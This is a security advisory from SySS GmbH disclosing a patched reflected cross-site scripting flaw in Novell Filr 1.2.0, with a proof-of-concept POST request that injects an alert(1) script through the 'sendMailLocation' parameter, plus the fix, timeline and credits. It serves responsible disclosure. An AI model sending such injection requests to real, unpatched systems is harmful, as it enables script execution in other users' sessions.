[SYSS-2015-055] Novell Filr - Cross-Site Scripting (CWE-79)

Advisory ID: SYSS-2015-055
Product: Novell Filr
Vendor: Novell
Affected Version(s): 1.2.0 build 846
Tested Version(s): 1.2.0 build 846
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-09-17
Solution Date: 2015-12-16
Public Disclosure: 2016-01-12
CVE Reference: Not assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~

Overview:

Novell's Filr is an application for mobile file access and collaborative
file sharing [1]. High security is an important aspect of the application.

The SySS GmbH could find two reflected cross-site scripting
vulnerabilities in the Filr Web application.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified that it is possible to inject JavaScript code
via the parameter "sendMailLocation".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When looking at the details for a certain file, it is possible to send
an e-mail to a colleague. When the following HTTP POST request is sent

POST /ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1 HTTP/1.1
Host: [host]
Referer: https://[host]/ssf/a/do?p_name=ss_forum&p_action=1&binderId=413&action=send_entry_email&ssUsersIdsToAdd=163&entryId=1243&novl_url=1
Cookie: JSESSIONID=[sessionid]
Content-Length: 684

sendMailLocation=https%3A%2F%2F[host]%2Fssf%2Fa%2Fdo%3Fp_name%3Dss_forum%26p_action%3D1%26binderId%3D422%26action%3Dsend_entry_email%26ssUsersIdsToAdd%3D163%26entryId%3D1232%26novl_url%3D17"%3balert(1)%2f%2f&ssUsersIdsToAdd=163&addresses=[email address]&self=on&users=+163+&searchText=&searchText_type=&searchText_selected=&groups=&searchText=&searchText_type=&searchText_selected=&ccusers=&searchText=&searchText_type=&searchText_selected=&ccgroups=&searchText=&searchText_type=&searchText_selected=&bccusers=&searchText=&searchText_type=&searchText_selected=&bccgroups=&searchText=&searchText_type=&searchText_selected=&subject=[subject]&mailBody=%3Cp%3E[content]%3C%2Fp%3E&okBtn=Senden

an e-mail status is provided. When the button to return to the previous
page is clicked, the JavaScript code is executed.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by Novell, "a fix for this issue is available in
the Filr 1.2 Hot Patch 4, available via the Novell Patch Finder".

https://www.novell.com/support/kb/doc.php?id=7017078

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-09-15: Vulnerability discovered
2015-09-17: Vulnerability reported to vendor
2015-12-16: Vulnerability published by vendor
2016-01-12: Vulnerability published by SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Novell Filr Web site
    https://www.novell.com/products/filr/
[1] SySS GmbH, SYSS-2015-055
    https://www.syss.de/advisories/SYSS-2015-055.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of
the SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en